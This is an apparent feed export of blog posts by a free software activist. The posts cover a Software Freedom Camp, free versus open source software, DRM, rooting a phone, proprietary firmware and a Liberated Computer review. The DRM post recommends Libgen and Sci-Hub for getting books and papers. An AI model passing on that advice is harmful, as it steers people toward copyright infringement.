software.\nFor example, I came to know about BigBlueButton from the camp. It is videoconferencing software which respects freedom and allows self-hosting.\nAnother motivation was to meet like-minded people, because usually people don’t get excited about free software, and therefore one can get demotivated.\nTo sum up, my motivations were:\nTo understand how free software communities work.\nTo know what software free software proponents use.\nTo meet like-minded people.\nMy motive was not really learning anything technical.\nHow I came to know about the camp\nThe camp was announced in mid-September 2020. A few days earlier, I had filled in the volunteer form for FSF India, and due to that group’s announcement, I came to know about the camp.\nExperience as a learner in the camp\nI registered for the camp and started joining the sessions when the camp commenced. In the first stage, the learners were divided into small groups based on their language preference. I was added to Group 6, which was a Hindi group, and Sruthi was assigned to our group from the organizing team as a co-ordinator (sorry, I cannot find a better word for this).\nI mixed well with this group. We used to have regular meetings and shared what we thought about various issues. People felt autonomous in sharing their thoughts. We also helped each other in various things; for example, I helped people in setting up their gpg keys and taught them how to send encrypted emails. So, it can be said that the Group 6 ice-breaking sessions really broke the ice, or maybe the ice was not even there to begin with. Groups were also given an activity to present on a topic assigned by the organizers. Our group decided to do an audio presentation on the topic. The topic was something related to democracy and digital rights (how surveillance, censorship etc. affect democracy). We all rehearsed it many times, suggested points to each other, and finally completed the recording and submitted it for the presentation in a camp session.
I found that overall, be it my group, other learners, organizers, or mentors, people were very helpful, kind and inclusive.\nThis ended our ice-breaking sessions.\nNext was the GNU\u002FLinux installation phase. I had a MacBook at that time. I could boot GNU\u002FLinux on my MacBook, but the touchpad didn’t work. So that was a bit sad. I badly wanted to run a GNU\u002FLinux distro on my MacBook. Maybe an external mouse would have worked, but I didn’t try that. Therefore, I proceeded in the camp with macOS installed.\nNext was the phase where we met people who earn their living from free software. I attended sessions by Abhas and Nagarjuna. They were good and gave me some insights. Abhas has a way of making sessions interactive which I would like to emulate in my own sessions (not only in the camp but anywhere). Nagarjuna raised issues mainly about copyright and was very interactive, which I really liked. He was in no hurry; he asked us questions, patiently waited for our responses and cleared doubts.\nNow came the projects phase. Initially, I was not excited to do any technical project, so I thought of choosing a non-technical one. I ended up choosing a technical one because I wanted to learn how to create websites so that I could create my own website. I chose the project offered by Karthik to learn the Hugo static site generator to create websites. The project was to create and maintain the Privacy Yathra website. I took the project as long-term work rather than just setting up the website as a part of the camp and running away.\nI didn’t work a lot on the project, and I could not learn Hugo within the deadline set by the camp. But later on, I set up this website you are reading, with the help of Sahil. From there on, I learnt from different people about different aspects of creating and maintaining the website. The Privacy Yathra website (which was the project of the camp) is not yet created, but as I now know how to work with Hugo and git (actually I still don’t know much), it will be up one day. Keep looking out for the Privacy Yathra website, folks :) It can be up anytime.\nShout out to all the people who made this work so smoothly. The organizers especially were always available for any help I needed and were very welcoming.\nAftermath\nAfter the conclusion of the camp, I have been integrated with FSCI as a campaigner. As mentioned above, I set up my website after the camp. Also, I am a part of the organizing team of the succeeding camp, named “Software Freedom Camp Diversity Edition 2021”, organized by FSCI. This year (2021) we are looking for diversity. We are focusing on reaching out to groups underrepresented in the free software community.  Registrations for learners are open till 15th October. Please register if you are interested and from an underprivileged background. Please help us raise awareness about the camp so that we can reach those who need it. You can share the camp poster on social media (even on Twitter, Facebook, Instagram; if you use them anyway, then why not?), with your contacts in chat, emails etc.\nWord for learners of the upcoming camps\nIf you are participating as a learner in any of the editions of the camp, then I have some advice for you. Hopefully, the above text gave you some idea of what happens in the camp. I think the best way to contribute to the camp is to contribute to free software. You might be surprised that the best way to contribute to free software is not about adding code or features to free software, although those are very good contributions.
I think it is not a good idea to improve the code of some free software or work on a free software project for a few months and then forget about free software. I would suggest you understand what free software philosophy is and why free software is important, use free software in your own life for your own work and, the hardest part, try to convince others to use free software and avoid proprietary software. If you are committed to free software philosophy, you will develop free software and contribute to free software as a side effect. If you are not committed to free software philosophy, then you will only contribute code to free software as a part of the camp and then forget about it. Take it as a lifetime project: switch to free software, contribute to it, and write code to develop or improve it. Also, avoid proprietary software.",[],{"slug":1976,"title":1977,"link":1978,"pubDate":1979,"contentSnippet":1980,"tags":1981,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"fs-and-oss-same","Are Free Software and Open Source Software the Same Thing?","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffs-and-oss-same\u002F","Sat, 25 Sep 2021 03:40:00 +0530","Have you ever wondered what the difference is between the terms “free software” and “open-source software?” Perhaps you think they are the same. It is often misunderstood that “free” refers to free of cost. The term “FOSS” is also very common. It expands to Free and Open Source Software. In addition, I have heard people say that since the software is open source and available free of cost, it is therefore denoted by the term FOSS. In this post, I’ll illustrate the difference between the two terms.\nFree Software refers to software which respects users’ freedom to run, study, modify, share and share modified versions of the software. For example, VLC media player, the Firefox browser, and Emacs. “Free” in Free Software refers to liberty, not price. The software I just mentioned also qualifies as Open Source. The definition of Open Source can be read on the opensource.org website by visiting this link. Since it is a bit too long, I didn’t include it here.\nPractically speaking, the terms “free software” and “open source software” refer to the same class of software. However, the main difference between the two terms lies not in the actual software, but in the values behind the respective movements. The Free Software movement campaigns for users’ freedom and insists that users must control the software running on their own devices. On the other hand, the Open Source movement does not put the issue in ethical terms like users’ freedoms or rights, but more as a practical choice.\nThe term “free software” has existed since 1984, while the term “open source” came into existence in 1998. Let’s look at why this new term was introduced even though the term “free software” was already there.\nQuoting the Open Source Initiative on coining the term open source,\nThe “open source” label was created at a strategy session held on February 3rd, 1998 in Palo Alto, California, shortly after the announcement of the release of the Netscape source code. The strategy session grew from a realization that the attention around the Netscape announcement had created an opportunity to educate and advocate for the superiority of an open development process.
The conferees believed the pragmatic, business-case grounds that had motivated Netscape to release their code illustrated a valuable way to engage with potential software users and developers, and convince them to create and improve source code by participating in an engaged community. The conferees also believed that it would be useful to have a single label that identified this approach and distinguished it from the philosophically- and politically-focused label “free software.” Brainstorming for this new label eventually converged on the term “open source”, originally suggested by Christine Peterson.\nIt is apparent from the quote above that the term “Open Source” was coined as a way to market the same idea represented by the term “Free Software”, detached from philosophical or moral considerations. It was promoted as a superior model of software development, not as a matter of user rights or freedom.\nMy friend and fellow Free Software activist Praveen has put this difference into a nice quote, which distinguishes the two very well:\nOpen Source wants to create better software, Free Software wants to create a better society.\nQuoting Richard Stallman from his famous article on the difference, and on the dangers of the open source movement’s approach of avoiding the question of ethics:\nWhen open source proponents talk about anything deeper than that, it is usually the idea of making a “gift” of source code to humanity. Presenting this as a special good deed, beyond what is morally required, presumes that distributing proprietary software without source code is morally legitimate.\nThis approach has proved effective, in its own terms. The rhetoric of open source has convinced many businesses and individuals to use, and even develop, free software, which has extended our community—but only at the superficial, practical level. The philosophy of open source, with its purely practical values, impedes understanding of the deeper ideas of free software; it brings many people into our community, but does not teach them to defend it. That is good, as far as it goes, but it is not enough to make freedom secure. Attracting users to free software takes them just part of the way to becoming defenders of their own freedom.\nSooner or later these users will be invited to switch back to proprietary software for some practical advantage. Countless companies seek to offer such temptation, some even offering copies gratis. Why would users decline? Only if they have learned to value the freedom free software gives them, to value freedom in and of itself rather than the technical and practical convenience of specific free software. To spread this idea, we have to talk about freedom. A certain amount of the “keep quiet” approach to business can be useful for the community, but it is dangerous if it becomes so common that the love of freedom comes to seem like an eccentricity.\nThe difference between the two movements is best illustrated by an incident involving TiVo, a video recorder, which used software that was free\u002Fopen-source and gave users the legal right to modify it, but whose hardware would not let users run their modified versions. This restriction was fine for Open Source proponents like Linus Torvalds, but Free Software proponents like Stallman opposed such restrictions. A new version of the GNU General Public License was written by the Free Software Foundation to address this issue. For more details on this, I suggest you read this page on the GNU website. 
Moreover, you can read the Wikipedia page too by clicking here.\nPersonally, I use the term “Free Software” and not “Open Source” because of my opposition to proprietary software. Furthermore, I agree with the ethical values associated with the term “Free Software”, and using this term helps me spread awareness about the difference and propagate those values.\nFeel free to use the term you prefer, but it is important to understand what the term means.",[],{"slug":1983,"title":1984,"link":1985,"pubDate":1986,"contentSnippet":1987,"tags":1988,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"drm","What is DRM and how it threatens your freedom","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fdrm\u002F","Thu, 23 Sep 2021 00:00:00 +0000","Ever used Spotify, Apple Music, Netflix or Hotstar? Ever wondered why you cannot copy the files from them and share them with someone? Ever wondered why you cannot download the files to your device, transfer them to another device, or play them in any other media player? Let’s be clear on this: downloading means that the file is now on your device and you can play\u002Fview it in any app of your choice. Download does not mean that you can only view the file in one particular app (like Spotify or Netflix) for offline use.\nThe answer is DRM.\nDRM is usually expanded as Digital Rights Management by publishers, record labels and streaming dis-services. The long form Digital Restrictions Management is closer to reality.\nDRM basically means digital files (any form of artwork, PDFs, music files or software) are encrypted in such a way that users cannot copy them. This threatens users’ freedom because technology allows us to copy files and share them with others. What is the point of “technological progress” (being able to copy files is an example of technological progress) if you cannot even use it?\nCopying is so inherent to the nature of digital files that it reminds me of the quote by Bruce Schneier, “Trying to make digital files uncopyable is like trying to make water not wet.” Also, since we can copy files without any marginal cost and share them with everyone, it raises a fundamental moral question. Quoting Eben Moglen, “If I can provide to everyone all goods of intellectual value or beauty, for the same price that I can provide the first copy of those works to anyone, why is it ever moral to exclude anyone from anything? If you could feed everyone on earth at the cost of baking one loaf and pressing a button, what would be the moral case for charging more for bread than some people could afford to pay?”\nThe usual argument in favor of DRM is that artists lose money when someone copies a file and shares it with someone else. This argument assumes that everyone who has a copy of the file would have paid for one if sharing were prohibited. In reality, a lot of those copies would never have been sold. Imagine a friend shared a book with you and you read it. Would you have read all such shared books if sharing were prohibited? When someone refuses to share a book or a music file with you, do you go to the market and purchase it? Also, when the marginal cost of copying is zero, nobody loses money when you copy a file. Compare this situation with physical objects like chairs, noodles, clothes etc. 
Every piece of a physical object has a production cost, while for software and digital files the cost lies only in developing the file or software; every copy after that is effectively free of cost (given that computers and mobile phones are household items that people use for personal purposes anyway, the cost of the device is not counted in the copying).\nNote that in the current system, only well-established artists really make money. Usually, the artists do not get fair compensation, and the streaming companies are the ones earning from artists’ work. These DRM-imposing dis-services act like a middle agency between users and artists, effectively robbing users of freedom and artists of pay.\nShould we prohibit users from copying files and sharing them, OR should we change our business model and allow them to share the files? Since DRM benefits only publishers, streaming services, record labels and the like, while everyone else receives discrimination, exclusion and a lack of freedom to use technology, I think the business model needs to change rather than restricting users from sharing.\nDRM is also being used in educational resources nowadays, which excludes people who cannot afford them as well as people who value freedom and will not use files containing DRM.\nDRM is already being used to discriminate against the poor in many ways.\nWhen a DRM-imposing service shuts down, users lose access to all the data they purchased from that service. For example, Yahoo Music used to distribute music files with DRM, and when it shut down, users could not back up their files and lost access to all the music they had purchased. Another example: when Microsoft’s ebook store closed, users lost all the ebooks they had purchased there.\nShould we wait for the companies to eliminate DRM from the files?\nNo. Companies might never remove DRM from their services. Rather, we can refuse to use services which impose DRM. You can use youtube-dl to download music files from many sites. You can use the NewPipe Android app to download music and videos from YouTube. For educational resources, we can use Libgen or Sci-Hub to download books and academic papers. Check the DRM-free guide by the FSF for websites which provide DRM-free content.\nEvery time you pay for a DRM product, the companies building such products get funded, either through your data or through direct payment. Refusing to use DRM services brings change at least to this extent: we stop funding such practices.\nBut the real change is to have a model in which authors\u002Fcreators get funded and release their content without DRM.\nWe can fund artists without DRM. Fans can directly fund artists for their work. A lot of YouTubers get money from their patrons on Patreon, and people do directly fund creators.\nHere are a few examples to demonstrate that the model can work:\nLouis C.K. released copies of his film without any restrictions or DRM, and the film turned a profit in 12 hours.\nDiesel Sweeties released a DRM-free webcomic ebook and had huge success, and has used a DRM-free, payment-optional model since then.\nThe band Radiohead released an album on their website without any restrictions, allowing listeners to pay nothing or any amount they liked.\nTherefore, we can fund artists directly and copy creative works with freedom. It is possible to have both freedom and creative work. 
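As a small illustration of the youtube-dl route mentioned above, a minimal invocation could look like the following sketch (an assumption-heavy example: it presumes youtube-dl and ffmpeg are installed, and the URL is only a placeholder for a DRM-free video on a site youtube-dl supports):\n# extract the audio track (-x) and convert it to a free format via ffmpeg\n# the URL below is a placeholder, not a real link\nyoutube-dl -x --audio-format vorbis 'https:\u002F\u002Fexample.com\u002Fsome-video'\nBoth -x and --audio-format are standard youtube-dl options.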
What do you think?",[],{"slug":1990,"title":1991,"link":1992,"pubDate":1993,"contentSnippet":1994,"tags":1995,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"phantoms-in-the-brain","Book Review: Phantoms in the Brain","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fphantoms-in-the-brain\u002F","Thu, 09 Sep 2021 00:00:00 +0000","A few days ago, I finished reading the book Phantoms in the Brain by V. S. Ramachandran. The topics covered here are fascinating, interesting, mysterious, disturbing and shocking. The cliche “Reality is stranger than fiction” comes to mind.\nThe book covers many disorders and tries to explain them in concrete neurological terms.\nOne of the cases presented in the book is that a majority of amputees who suddenly lose a limb in an accident feel pain in the lost limb. Many patients feel that the fingers of the lost limb (even though the fingers are no longer attached to the body) are clenched tightly, and this leads to unbearable pain (called phantom pain, hence the title of the book).\nIn the past, neurologists regarded such cases as mental problems and handed such patients over to psychiatrists. The book holds the view that damage to specific portions of the brain leads to loss of the functionality which those portions carry. This is fascinating because when trying to understand these cases, it seems like we are only looking at exceptional cases, yet at the same time they tell us a lot about the normal human brain. Ramachandran brought a fresh approach and looked at how phantoms (the patients still feel that the lost limb is attached to the body, and such a limb is called a phantom limb) are generated and how the brain can be tricked into unlearning a phantom. Would you like to look at the solution\u002Ftreatment of phantom pain? It is here. The solution is interesting as well.\nThe human brain can easily be tricked. Our brains carry so many cognitive biases, delusions and denials of obvious facts. Quoting Oliver Sacks from the preface of the book, “The deeply strange business of mirror agnosia, and that of misattributing one’s own limbs to others, are often dismissed by physicians as irrational. But these problems are also considered carefully by Ramachandran, who sees them not as groundless or crazy, but as emergency defense measures constructed by the unconscious to deal with sudden overwhelming bewilderments about one’s body and the space around it. They are, he feels, quite normal defense mechanisms (denial, repression, projection, confabulation, and so on) such as Freud delineated as universal strategies of the unconscious when forced to accommodate the intolerable or unintelligible.”\nThe topic presented here aligns very well with Daniel Kahneman’s Thinking, Fast and Slow, which says that there are two modes of thinking: System 1 and System 2. System 1 is fast, effortless, and jumps to conclusions. It cannot be consciously controlled by us, but we can train habits into System 1 (driving, walking, or playing a cricket ball sit in System 1 for a person who has practiced enough). System 2 is slow and consumes effort and resources. 
Heavy cognitive tasks are done using System 2.\nOverall, Phantoms in the Brain urges neuroscientists to be more open in their approach, while at the same time being fun to read, engaging and accessible to a general audience.",[],{"slug":1997,"title":1998,"link":1999,"pubDate":2000,"contentSnippet":2001,"tags":2002,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"rooting-my-phone","I rooted my Samsung Galaxy S9+","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Frooting-my-phone\u002F","Tue, 07 Sep 2021 00:00:00 +0000","(Warning: Installing a custom ROM on your device will void your warranty, and there is a risk that it can brick your device.)\n(Note: In my case, I could afford to risk bricking my phone.)\nIndex\nWhat is rooting?\nMy experience of rooting\nHow much free software does iode OS have\nHow to install a custom ROM\nWhat is rooting?\nA user having root access to an operating system means they have the capability to make unrestricted changes to the system. Such a user is also called a superuser or an admin. Check out the wiki page for more details.\nMobile phones which ship with Android pre-installed do not give users root access by default. For example, users have read-only permissions for the \u002Fsystem\u002F partition on the phone. Therefore, users need to put effort into gaining root access to their devices. This extra effort is what we call ‘rooting’. Check this Wikipedia page for a good list of the advantages that rooting provides to users. It gives users full control over their devices.\nAndroid phones are shipped with nonfree software preinstalled which users cannot remove without having root access. Apps like YouTube, the Google Play Store and other malware by Google are usually preinstalled. I wanted to remove the nonfree software from my phone.\nTo read about the freedom issues in Android in more detail, please check Richard Stallman’s article on this topic.\nMy experience of rooting\nI have a Samsung Galaxy S9+ phone, and I searched on the internet for ROMs that can be installed on this device. I found the information on the internet very confusing and disorganized. Since there was a risk of bricking my phone, which would make it unusable, I thought of consulting someone who had installed custom ROMs many times and could give some of their time to guide me. I consulted Abhas, who is a hacker and has a lot of experience in installing custom ROMs. We were on a video call, and Abhas gave me instructions.\nThe steps we followed are listed in this text file. Note that I used Debian, a GNU\u002FLinux based operating system, on my laptop. Depending on your phone model and laptop operating system, the steps mentioned at the URL will differ.\nFirst, we tried installing Carbon ROM, but it failed somehow. Then Abhas suggested I try iode OS, and I installed it. The XDA page for iode OS for my phone is here.\nCheck out the iode OS screenshots I took after the fresh install (I may have installed a few apps before taking these screenshots).\nImportant note: After the install, a Jio SIM does not work, because iode OS (like many other custom ROMs) does not have VoLTE support.\nTo gain root access, I flashed Magisk using TWRP.\nAfter this, I learnt to flash a ROM myself and successfully installed an older version of Lineage OS on a Moto G4 Plus.\nHow much free software does iode OS have\niode OS is a free software operating system which does not have any Google apps pre-installed. 
In fact, the only nonfree app pre-installed is Magic Earth. I immediately uninstalled it. I suggest the iode OS team remove Magic Earth; if they would like to ship a maps app, my suggestion is to add Organic Maps, which takes its data from OpenStreetMap.\nThe phone still contains nonfree firmware, which is necessary for some hardware, like WiFi, to function properly, and the nonfree firmware itself is a serious issue in terms of user freedom. Even though the phone does not contain 100% free software, it is still a big step towards my freedom. None of the Google or Samsung apps that came pre-installed remain on my phone.\nNonfree software in iode OS: Magic Earth + nonfree firmware.\nList of a few pre-installed software in iode OS:\nF-Droid, modified to give priority to the iode repository;\nQKSMS\niode Browser\nmicroG\npep\nGeometric Weather app\nHow to install a custom ROM\nYou can also install a custom ROM if you have an Android phone. If you have an iPhone, I don’t know anything about flashing a custom ROM there as of now. Perhaps ditching the iPhone is the only step towards freedom.\nTo find a custom ROM built for your phone, first check whether Lineage OS has official support for your phone. If Lineage OS is available for your device, then go for it. Check the Lineage OS website for instructions on installing it on your phone.\nSteps for choosing a custom ROM:\nVisit the XDA Forums.\nScroll down to the All Categories section.\nChoose your manufacturer from the All Categories list, for example, Samsung, Redmi etc.\nChoose the exact model of your phone, like Samsung Galaxy S9+. For my phone, this leads to this page.\nChoose ROMs, Kernels from the list. This leads us to this page for my phone model.\nCheck for posts with OSS and OFFICIAL tags. Also check whether gapps (Google Apps) are included or not. I suggest you not include gapps.\nIf you click on a post, it will also contain instructions on how to flash a custom ROM.\nNow the steps involved in installing a custom ROM on your phone are:\nUnlock the bootloader of the phone.\nRun the phone in download mode and flash a recovery project like TWRP onto the phone.\nUse TWRP to wipe all the data (Dalvik cache, system, cache, data), then flash the downloaded ROM image.\nReboot to recovery.\nDepending on your device and the operating system on your laptop, the way to perform these steps will differ.\nI know that these steps can be overwhelming for nontechnical users or users who haven’t done this before. Therefore, I am planning to make a video tutorial on rooting a phone in the future.
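Until then, here is a rough sketch of what the flashing steps can look like from a terminal (illustrative only: it assumes a device exposing a fastboot interface and a TWRP image saved as twrp.img; Samsung phones like mine instead use download mode with tools such as Odin or Heimdall, and exact commands vary widely by device):\n# reboot the phone into its bootloader\nadb reboot bootloader\n# unlock the bootloader; newer devices use 'fastboot flashing unlock'\nfastboot oem unlock\n# flash the recovery image (twrp.img is an assumed filename)\nfastboot flash recovery twrp.img\nAfter that, boot into recovery with your device’s key combination and do the wipe-and-flash steps from the recovery menus, always following the instructions written for your specific model.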
",[],{"slug":2004,"title":2005,"link":2006,"pubDate":2007,"contentSnippet":2008,"tags":2009,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"firmware","Ethical issues regarding firmware","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Ffirmware\u002F","Mon, 06 Sep 2021 00:00:00 +0000","Index\nWhat is firmware\nProblems with proprietary firmware\nImportance of free firmware\nWhat is firmware\nFirmware is software which provides a way for hardware to interact with the operating system. It runs on a secondary processor and not on the CPU. For example, the WiFi chipset will run this code directly instead of the main CPU. Firmware files aren’t run by the kernel itself; they’re loaded by the kernel onto other pieces of hardware.\nQuoting the Debian wiki on what firmware is:\nFirmware refers to embedded software which controls electronic devices. Well-defined boundaries between firmware and software do not exist, as both terms cover some of the same code. Typically, the term firmware deals with low-level operations in a device, without which the device would be completely non-functional.\nFor example, the remote control of a television uses firmware to convert your button presses into infrared signals that the television can understand. For more examples of firmware, please check this wiki page.\nLet’s suppose you are able to boot and install a free software operating system, like a GNU\u002FLinux based operating system, and you did not install any nonfree software. You might be tempted to say that you are running only free software, but you might still be running proprietary firmware. For example, Ubuntu comes pre-installed with nonfree firmware. Depending upon your laptop, you might need to install nonfree firmware in addition to the operating system for some hardware to work properly.\nProblems with proprietary firmware\nThe problem with proprietary firmware is the same as with any proprietary software: users do not control it, and we cannot trust it. It does not give users freedom, and therefore users have no defence against bugs or intentional malfunctionality introduced into the system.\nQuoting Mark Shuttleworth, the founder of Canonical, which develops and maintains Ubuntu:\nIf you read the catalogue of spy tools and digital weaponry provided to us by Edward Snowden, you’ll see that firmware on your device is the NSA’s best friend.\nFollowing are some known examples of security problems caused by bugs or intentional malfunctionality at the firmware level:\nA researcher broke into Apple’s firmware and caused the battery to overcharge.\nThe NSA adds spyware to the firmware of many devices.\nWikileaks revealed that several CIA projects infect Apple Mac firmware (meaning the infection persists even if the operating system is re-installed). Basically, EFI\u002FUEFI is essentially a backdoor for taking control of a computer without the user’s knowledge. Further, the attacks described in the leaks are very widespread.\nA vulnerability in the EFI\u002FUEFI firmware is used by the CIA to write to NVRAM, the persistent storage of the computer, without the user knowing about it. It cannot easily be detected by users, and it can survive a complete OS reinstall.\nCIA documents leaked by Wikileaks note that UEFI-level exploits can compromise the whole system. The ExitBootServices Hooking page notes, “At this point, you can do whatever you want.”\nKeep in mind that if a backdoor is installed at the firmware level, it can gain full access to your computer. Such control of the system means that the applications running on your machine are also fully compromised.\nImportance of free firmware\nIn the previous section, we saw that proprietary firmware, which is not controlled by the user, is no light issue. It is a very serious one: the well-known exploits in such firmware can make you prey to the NSA or other third-party spying without you even knowing.\nFirmware, like any software, should be free software, so that users have the freedom to detect and fix bugs, remove any backdoors put into the firmware, and address the other problems that can arise with proprietary firmware. For this, manufacturers need to publish key technical specifications sufficient to write free firmware for their hardware. 
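If you are curious which firmware files your own GNU\u002FLinux system loads, one quick way to check is to search the kernel log (a small illustrative sketch; the output varies by kernel and distribution, and dmesg may require root):\n# list kernel messages that mention firmware loading\ndmesg | grep -i firmware\nLines referring to files under \u002Flib\u002Ffirmware usually point to blobs shipped by your distribution’s firmware packages, many of which are nonfree.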
Even if you are running proprietary firmware, if you ditch Windows or macOS or any proprietary operating system to switch to a free software operating system like GNU\u002FLinux, I welcome your move as one more step towards freedom.\nA very important example of firmware is the BIOS, which starts your computer when you power it on. Libreboot and Coreboot are free software BIOS implementations.\nLiberated Computer (the laptop I use) runs on Coreboot, and the only nonfree software it has is the Intel ME blob, which is disabled. That means that in normal operation it runs purely free software.\nThe following devices have only free firmware installed at the time of shipping:\nDevices which can run Replicant OS (Note: you might have to use external hardware\u002Fdongles for WiFi and Bluetooth to work)\nDevices that have Libreboot support\nDevices which are RYF certified by the FSF\nUnfortunately, proprietary firmware is not even considered a problem by many people who care about software freedom. Perhaps there is a lack of awareness of the issue. If that is the case, then hopefully I have now made you aware of the issues with proprietary firmware.\n(Credits: Thanks to Pirate Praveen for proofreading the article and correcting some factual errors.)\nFor further reading:\nDebian wiki.",[],{"slug":2011,"title":2012,"link":2013,"pubDate":2014,"contentSnippet":2015,"tags":2016,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"liberated-computer","Liberated Computer Review","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fliberated-computer\u002F","Sun, 05 Sep 2021 00:00:00 +0000","Update: Added some pictures on 29-April-2022.\nWhat is Liberated Computer\nLiberated Computer is a computer sold by LibreTech Shop, based in Bangalore, India, which can run exclusively on free software (meaning software that respects users’ freedom, not software that is free of cost) and does not ship with any proprietary software installed. Liberated Computers are basically old, refurbished Lenovo ThinkPad laptops, modified in several ways so that they can run purely free software (check the section “How is an LC230 assembled?” in the LC 230 docs). In addition, it respects users’ hardware freedom as well: you can do whatever you wish with the hardware, with no locks or constraints imposed by the manufacturer.\nThe computer is liberated by replacing the stock BIOS, which won’t let a chip run if it is not in its allow list. Further, the Intel ME backdoor has been disabled.\nIt has Coreboot, whose code is 100% free software. The X230 BIOS contains the Intel Management Engine, which is then neutered using me_cleaner. That is a blob (a blob is software whose source code is not published, only the binary; blobs are nonfree software), but that blob is inactive during the normal working of the operating system. There is no other blob in Liberated Computer. I will explain why free firmware matters in the next post. This makes Liberated Computer run on 100% free software.\nHere is a screenshot of a tweet by Leah Rowe, the founder of the Libreboot project, on the Lenovo X230 (remember that Liberated Computer is just a refurbished Lenovo X230) and Coreboot.\n\nWhy I bought Liberated Computer\nI bought a Liberated Computer for a simple reason: the attitude that freedom comes first and features are secondary. Free Software provides users the freedom to run, study, modify, improve and share the software. 
If the software lacks any of these freedoms, it is called nonfree\u002Fproprietary software.\nI think free software is necessary for:\nprivacy and security of users, though it might not be sufficient;\nlearning and doing things ourselves;\nhaving a defence against mistreatment by proprietary software.\nThere are many other reasons to use free software.\nI also think that the freedoms provided by free software are every user’s rights. I am not of the opinion that we should use whatever software works; the software should respect users’ freedom. Naturally, I would like to run only free software and eliminate all the nonfree software from my life.\nMy Purchase\nI used to have Apple’s MacBook, which is a very locked-down system; you don’t really own it even after purchasing it. After I got convinced that software freedom is important, I tried to use only free software and avoid proprietary software as much as possible. However, a lot of the free software I needed was not available for the MacBook, and I doubt a MacBook can run without any proprietary software at all. Therefore, I was looking for a computer which can run exclusively on free software, without requiring any proprietary software. I knew that Librem laptops can run purely free software and would satisfy my requirement, but I didn’t know about any Indian vendors selling such a laptop. One day, I asked in the FSCI Matrix room whether there are Indian shops selling such laptops. That is how I came to know about LibreTech Shop, based in Bangalore, which sells free-software-powered laptops and calls them ‘Liberated Computer’. A few months later, I decided to buy an LC 230.\nI ordered the LC 230 using the Mostly Harmless website, with 16 GB RAM, a 480 GB SSD, and a new 6-cell battery. The itemized cost (INR):\nBase Price: ₹ 27,000.00\nRAM (16 GB): ₹ 3,500.00\nSSD (480 GB): ₹ 2,500.00\nNew Battery (6-cell): ₹ 3,500.00\nSubtotal: ₹ 36,500.00\nShipping (Flat Rate): ₹ 1,200.00\nGST: ₹ 6,786.00\nTotal: ₹ 44,486.00\nI placed my order on a Saturday. Abhas shipped it three days later, on Tuesday, via DTDC priority shipping, and I received the laptop on Thursday.\nMy experience with LC 230\nThe laptop had KDE Neon pre-installed, but Abhas (the owner of the shop where I purchased the Liberated Computer) suggested I re-install an OS of my choice on my own. I re-installed KDE Neon using a bootable USB. I explored KDE Neon and liked it: I found it user-friendly and got comfortable in a few hours.\nThen I booted PureOS, Ubuntu, Kubuntu, Manjaro KDE, Solus Budgie etc. Finally, I settled on Debian 11 KDE, and I am using it as my main OS right now.\nThe new battery lasts around 5 hours from a fully charged state to zero.\nThe low speaker volume is somewhat off-putting. Instead of a backlit keyboard, it has a Thinklight which shines light on the keyboard so you can work in the dark.\nIt has hardware kill switches for the microphone, audio and wireless connections. It has a webcam too.\nSwitched to GNU\u002FLinux\nFinally, I switched to GNU\u002FLinux. GNU\u002FLinux operating systems are free software and fully under the user’s control, and this is exactly my reason for the switch. The nonfree macOS and Windows are full of trackers. Debian, on the other hand, does not have any trackers or spyware. It respects my freedom and privacy.\nHappy Hacking!\nPictures\nFollowing are some pictures of the Liberated Computer taken by me. 
All of them are released under the CC-BY-SA license.\nLiberated Computer running the official ISO (which contains only free firmware) of Debian GNU\u002FLinux with the MATE desktop.\nLiberated Computer running PureOS.\nLiberated Computer running PureOS.\nLiberated Computer running PureOS.\nLiberated Computer running Coreboot.\nLiberated Computer keypad and touchpad.\nTails OS running on Liberated Computer.\nFedora 35 live USB running on Liberated Computer.\nUbuntu 20.04.3 LTS live USB running on Liberated Computer.\nUbuntu Desktop on Liberated Computer.\nManjaro KDE 21.2.1 running on Liberated Computer.\nTrisquel 10 desktop on Liberated Computer.\nManjaro running on Liberated Computer.\nTrisquel 10.0 running on Liberated Computer.",[],{"slug":2018,"title":2019,"link":2020,"pubDate":2021,"contentSnippet":2022,"tags":2023,"maintainerName":38,"maintainerUsername":39,"maintainerPhoto":40,"feedUrl":41},"meeting-rms","My Meeting with Richard Stallman","https:\u002F\u002Fravidwivedi.in\u002Fposts\u002Fmeeting-rms\u002F","Sat, 31 Jul 2021 00:00:00 +0000","I am writing about a meeting which happened more than five years before I wrote this article. This is the best recreation from memory that I could come up with.\nAt the time this happened, I was a student at Acharya Narendra Dev College (also known as “ANDC” for short), New Delhi. On the 1st of March 2016, the principal of my college, Dr. Savithri Singh, was addressing all the students in a common hall (for some reason I don’t remember). During the address, she told us that the founder of Linux was visiting our college that day. She invited interested students to come to her office at 4 PM to meet him. I was sitting with my friend Shivam Rai, who was excited about the meeting. I am from a mathematics background and hardly knew anything about Linux. I had heard the word “Linux” and knew that it was the kernel of some operating system. So, I wasn’t very enthusiastic.\nAround 4 PM, I was a bit tired and wanted to go back to my room to take a nap. I was not completely sure about the point of the meeting. Furthermore, I thought they would discuss programming or coding the way mathematicians discuss theorems and proofs. I almost forgot about it. However, my friend reminded me of the meeting, so I joined him.\nWe went to the principal’s office, and after waiting for some time, the visitor arrived along with a person from Kerala. My friend and I shook hands with the visitor, and he said, “Hi, my name is Richard Stallman”. We also introduced ourselves. The person from Kerala introduced himself too, but unfortunately, I forgot his name. Immediately, Richard Stallman asked us a question in a joking manner, “If I were to start a company in India, what should I name it?”. We were silent. Then he said, “Mahadeva”, followed by a big laugh.\nIt turned out that, even though the principal had invited the whole college to meet Richard Stallman, only the two of us actually went to meet him. Next, since the principal had said that he was the founder of Linux, we started the discussion with something along the lines of “You are the founder of Linux?” Hearing this, he got angry and said, “You should ask that question from Linus Torvalds.” I was confused at this point, and so was my friend.\nThen we asked, “What do you work for?” 
